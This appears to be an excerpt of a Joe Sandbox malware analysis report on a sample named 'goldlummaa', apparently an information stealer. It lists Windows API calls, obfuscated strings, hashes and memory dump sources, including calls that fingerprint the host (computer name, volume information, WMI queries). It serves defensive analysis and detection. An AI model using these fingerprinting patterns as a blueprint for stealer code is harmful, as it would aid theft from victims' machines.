                                                                                                                  • Opcode Fuzzy Hash: 91c58075236d8c9bdba84c591242bf236afa9ab35098e7872cab18f787b76dc4
                                                                                                                  • Instruction Fuzzy Hash: 96219D71600205AFDB30AFB6CCC1DBB77A9AF44368710C925F9A9D7260DB31ED509BA1
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,50496CFE,?,?,00000000,00C71B77,000000FF,?,00C66B21,00000002,?,00C66BBD,00C67DE9), ref: 00C66A95
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C66AA7
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00C71B77,000000FF,?,00C66B21,00000002,?,00C66BBD,00C67DE9), ref: 00C66AC9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                  • Opcode ID: 7f885fb526d5af4b732cb2fb12da65804ffdd76c34cc392c3750c1522e94d3b9
                                                                                                                  • Instruction ID: cbd08bab87702d7d691c1d7d84a9bb0bccbda58a42d957d290b69aeac26694c5
                                                                                                                  • Opcode Fuzzy Hash: 7f885fb526d5af4b732cb2fb12da65804ffdd76c34cc392c3750c1522e94d3b9
                                                                                                                  • Instruction Fuzzy Hash: 2901F971944619FFCB118F90CC49FBEB7B8FB44B14F044229F826E22D0DB749944CA80
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00C6470A
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C64729
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C64757
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C647B2
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C647C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 66001078-0
                                                                                                                  • Opcode ID: 2f7cb87176023b27672013303e3c3c47ce2c39b81188221f8406acc4ba1bae9b
                                                                                                                  • Instruction ID: cd96d6fa93c394fe8e9d3243885205bc8f1e1a81c3bef37520624b2301cc9c0b
                                                                                                                  • Opcode Fuzzy Hash: 2f7cb87176023b27672013303e3c3c47ce2c39b81188221f8406acc4ba1bae9b
                                                                                                                  • Instruction Fuzzy Hash: EF41603590064ADFCB38DF65C8C5AAAB3F5FF0A311B10492AD466D7A81D730FA84CB61
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C6D29C,00000000,?,00C7B728,?,?,?,00C6D1D3,00000004,InitializeCriticalSectionEx,00C73740,00C73748), ref: 00C6D20D
                                                                                                                  • GetLastError.KERNEL32(?,00C6D29C,00000000,?,00C7B728,?,?,?,00C6D1D3,00000004,InitializeCriticalSectionEx,00C73740,00C73748,00000000,?,00C68E2C), ref: 00C6D217
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C6D23F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                  • String ID: api-ms-
                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                  • Opcode ID: e81ebc06310108723d6dad820694ee66253aa793a655dfe7a5c541e6d4e64098
                                                                                                                  • Instruction ID: 5ba8915da9d1fc70d49f0bbdaed256ea752c90e1dee6efcd8f26f3dae21e9299
                                                                                                                  • Opcode Fuzzy Hash: e81ebc06310108723d6dad820694ee66253aa793a655dfe7a5c541e6d4e64098
                                                                                                                  • Instruction Fuzzy Hash: 64E01A70B80208B7EB211B61EC4AF683B649F40B52F144020FE1DE80A1DFB1EED89584
                                                                                                                  APIs
                                                                                                                  • GetConsoleOutputCP.KERNEL32(50496CFE,00000000,00000000,?), ref: 00C6DD0B
                                                                                                                    • Part of subcall function 00C6C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C6D6D0,?,00000000,-00000008), ref: 00C6C902
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C6DF5D
                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C6DFA3
                                                                                                                  • GetLastError.KERNEL32 ref: 00C6E046
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2112829910-0
                                                                                                                  • Opcode ID: 3627e85238dd6b8dc4359e2f9c7fc6465f859262ff04b4945ac49e069904c031
                                                                                                                  • Instruction ID: 150e0b8e4a3efaf36c3a19130549cb76f83bbbf913184abc63e0d71b5237ba5a
                                                                                                                  • Opcode Fuzzy Hash: 3627e85238dd6b8dc4359e2f9c7fc6465f859262ff04b4945ac49e069904c031
                                                                                                                  • Instruction Fuzzy Hash: B5D16B75E00248DFCB25CFA8D8C4AADBBB5FF09310F28416AE566EB351D730A946CB50
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AdjustPointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1740715915-0
                                                                                                                  • Opcode ID: e109ccbcc6e2d90ce334f64b8ab7651354f8ddca63a840b67cb9be2cf65cb845
                                                                                                                  • Instruction ID: 26c2d6608394a1c378ef266aded2e16e863faf77d417657e1e2fa51737b0b898
                                                                                                                  • Opcode Fuzzy Hash: e109ccbcc6e2d90ce334f64b8ab7651354f8ddca63a840b67cb9be2cf65cb845
                                                                                                                  • Instruction Fuzzy Hash: A351C3716016069FEB398F54D8C1BBA77A4EF04710F24462DFA16972A1EF31ED88EB50
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00C6C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C6D6D0,?,00000000,-00000008), ref: 00C6C902
                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00C6C0CE,?,?,?,00000000), ref: 00C6BD8C
                                                                                                                  • __dosmaperr.LIBCMT ref: 00C6BD93
                                                                                                                  • GetLastError.KERNEL32(00000000,00C6C0CE,?,?,00000000,?,?,?,00000000,00000000,?,00C6C0CE,?,?,?,00000000), ref: 00C6BDCD
                                                                                                                  • __dosmaperr.LIBCMT ref: 00C6BDD4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1913693674-0
                                                                                                                  • Opcode ID: 276a43e9f687837c9c14840d096ee51d98945d23baf38b1546d877a143a43661
                                                                                                                  • Instruction ID: b8a8a5eb33efdcc32f3bbda2b397d3cf058218a15423ed707b102c81cf065ecb
                                                                                                                  • Opcode Fuzzy Hash: 276a43e9f687837c9c14840d096ee51d98945d23baf38b1546d877a143a43661
                                                                                                                  • Instruction Fuzzy Hash: CE21D171600206BFDB30AFA6CCC0D6BB7A8FF443647108428F829DB151DB31ED92AB91
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00C6C9A5
                                                                                                                    • Part of subcall function 00C6C8A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C6D6D0,?,00000000,-00000008), ref: 00C6C902
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C6C9DD
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C6C9FD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 158306478-0
                                                                                                                  • Opcode ID: f7de81376219aae8ad7308b5eceaf056f3596758cfc9a96a329bb49080482a94
                                                                                                                  • Instruction ID: 3afbbbff5839fcabae08682efcaa146f85b5fe0f67433f6fcf681e9d18bee32a
                                                                                                                  • Opcode Fuzzy Hash: f7de81376219aae8ad7308b5eceaf056f3596758cfc9a96a329bb49080482a94
                                                                                                                  • Instruction Fuzzy Hash: 0F11D6F190561DBFA731A7F29CCDDBF295CDE583A43100025F656E2142FE64CE41A6B1
                                                                                                                  APIs
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00C61E2D
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00C61E3B
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00C61E54
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00C61E93
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2261580123-0
                                                                                                                  • Opcode ID: de16345321e050a086a3ac47f5e54f66b1e3a35382ea5aae9e0577637b1468f3
                                                                                                                  • Instruction ID: 2da6e6eb0d424ced58eb7fde2157d86eae6ba6fe01fb81cf9ec5d7634608008e
                                                                                                                  • Opcode Fuzzy Hash: de16345321e050a086a3ac47f5e54f66b1e3a35382ea5aae9e0577637b1468f3
                                                                                                                  • Instruction Fuzzy Hash: 4621E4B0E042098FCB18EFA8C485BAEBBF1EF48300F05845DE859A7351DB399A41DF61
                                                                                                                  APIs
                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000), ref: 00C6FD17
                                                                                                                  • GetLastError.KERNEL32(?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000,?,?,?,00C6D9E0,00000000), ref: 00C6FD23
                                                                                                                    • Part of subcall function 00C6FD74: CloseHandle.KERNEL32(FFFFFFFE,00C6FD33,?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000,?,?), ref: 00C6FD84
                                                                                                                  • ___initconout.LIBCMT ref: 00C6FD33
                                                                                                                    • Part of subcall function 00C6FD55: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C6FCF1,00C6F48E,?,?,00C6E09A,?,00000000,00000000,?), ref: 00C6FD68
                                                                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00C6F4A1,00000000,00000001,00000000,?,?,00C6E09A,?,00000000,00000000,?), ref: 00C6FD48
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2744216297-0
                                                                                                                  • Opcode ID: a48029367084bc7ed9f1b0d20f43ddddbe072618b003fcf21a9154b7b476c651
                                                                                                                  • Instruction ID: 06b96782cf60b77791e5206782692cd02750350900cc60ca3230386906187f0b
                                                                                                                  • Opcode Fuzzy Hash: a48029367084bc7ed9f1b0d20f43ddddbe072618b003fcf21a9154b7b476c651
                                                                                                                  • Instruction Fuzzy Hash: 30F0C036540116BBCF232F95EC4CB9E3F26FB493A1B044124FA1D95130DA7299A5AB91
                                                                                                                  APIs
                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C64F13
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00C64F22
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00C64F2B
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00C64F38
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2933794660-0
                                                                                                                  • Opcode ID: 332bb9336269f4b4d79c33b330545a4299c237ae359ea57905ef6962271392d7
                                                                                                                  • Instruction ID: 9a6e7c6a1abb1b3c8b5c7dff978cee3f769a0edd9055681235deb87039a01d3f
                                                                                                                  • Opcode Fuzzy Hash: 332bb9336269f4b4d79c33b330545a4299c237ae359ea57905ef6962271392d7
                                                                                                                  • Instruction Fuzzy Hash: 17F06274D5020DEBCB00DBB4DA49B9EBBF4FF1C204BA14995A516E7110EB30AB889B51
                                                                                                                  APIs
                                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00C68AFE,?,?,00000000,00000000,00000000,?), ref: 00C68C22
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EncodePointer
                                                                                                                  • String ID: MOC$RCC
                                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                                  • Opcode ID: b8af197d8859dd278308d1cbf33da83bc74e9f16143d7ba9f59526157ff31f20
                                                                                                                  • Instruction ID: a0e2df37cfabdccd9e00604075e44e839d4ed4a9558bd7bfd95eaf5f44d018d0
                                                                                                                  • Opcode Fuzzy Hash: b8af197d8859dd278308d1cbf33da83bc74e9f16143d7ba9f59526157ff31f20
                                                                                                                  • Instruction Fuzzy Hash: 8C418A71900209EFCF25DF98CD81AEE7BB5FF48304F144659FA1467251D7359A50DB60
                                                                                                                  APIs
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00C686E0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ___except_validate_context_record
                                                                                                                  • String ID: csm$csm
                                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                                  • Opcode ID: e18761915babe4a514628ee9eaa99c03599d9fb2baf91e0370bb6c98822550df
                                                                                                                  • Instruction ID: 749f169c7555a7e068ed66d6e3e98ae38940298b14e8f5798ceca97803932b8f
                                                                                                                  • Opcode Fuzzy Hash: e18761915babe4a514628ee9eaa99c03599d9fb2baf91e0370bb6c98822550df
                                                                                                                  • Instruction Fuzzy Hash: 6331B536400219DBCF368F50DCC49AA7BE6FF08715B384759F86449221DB32CDA6EB91

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:7.3%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:43.3%
                                                                                                                  Total number of Nodes:238
                                                                                                                  Total number of Limit Nodes:20

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  APIs
                                                                                                                  • CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
                                                                                                                  • SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
                                                                                                                  • SysAllocString.OLEAUT32(w!s#), ref: 004364FB
                                                                                                                  • SysAllocString.OLEAUT32(A3q5), ref: 004365A1
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00436613
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00436775
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004367A0
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004367A6
                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                                                                                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004367E7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                  • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                  • API String ID: 2573436264-4124187736
                                                                                                                  • Opcode ID: ca50f7cf4d3e9b07668249a1021e5b411807a3e5f20311e201539803fa80780b
                                                                                                                  • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                  • Opcode Fuzzy Hash: ca50f7cf4d3e9b07668249a1021e5b411807a3e5f20311e201539803fa80780b
                                                                                                                  • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A

Control-flow Graph
[Graph not reproduced. First block: 42b4fc-42b558. Calls in graph: 43c280, FreeLibrary, GetComputerNameExA, 42f3e0]
APIs
• FreeLibrary.KERNEL32(?), ref: 0042B5FE
• GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042B63A
• GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042B726
Memory Dump Source
• Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ComputerName$FreeLibrary
• String ID: %(#}$/$/26-$1
• API String ID: 2243422189-261129489
• Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
• Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
• Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
• Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56

Control-flow Graph
[Graph not reproduced. First block: 42b4f7-42b60f. Calls in graph: 43c280, GetComputerNameExA, 42f3e0]
APIs
• GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042B63A
• GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042B726
Similarity
• API ID: ComputerName
• String ID: %(#}$/$/26-$1
• API String ID: 3545744682-261129489
• Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
• Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
• Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
• Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
Similarity
• API ID:
• String ID: in~x$kmbj$ydij$Z\
• API String ID: 0-979945983
• Opcode ID: 7cc7601ca1ee28cd6491a20fbffaf33e16e54dbc7ed2fef88dca781f2573c0e0
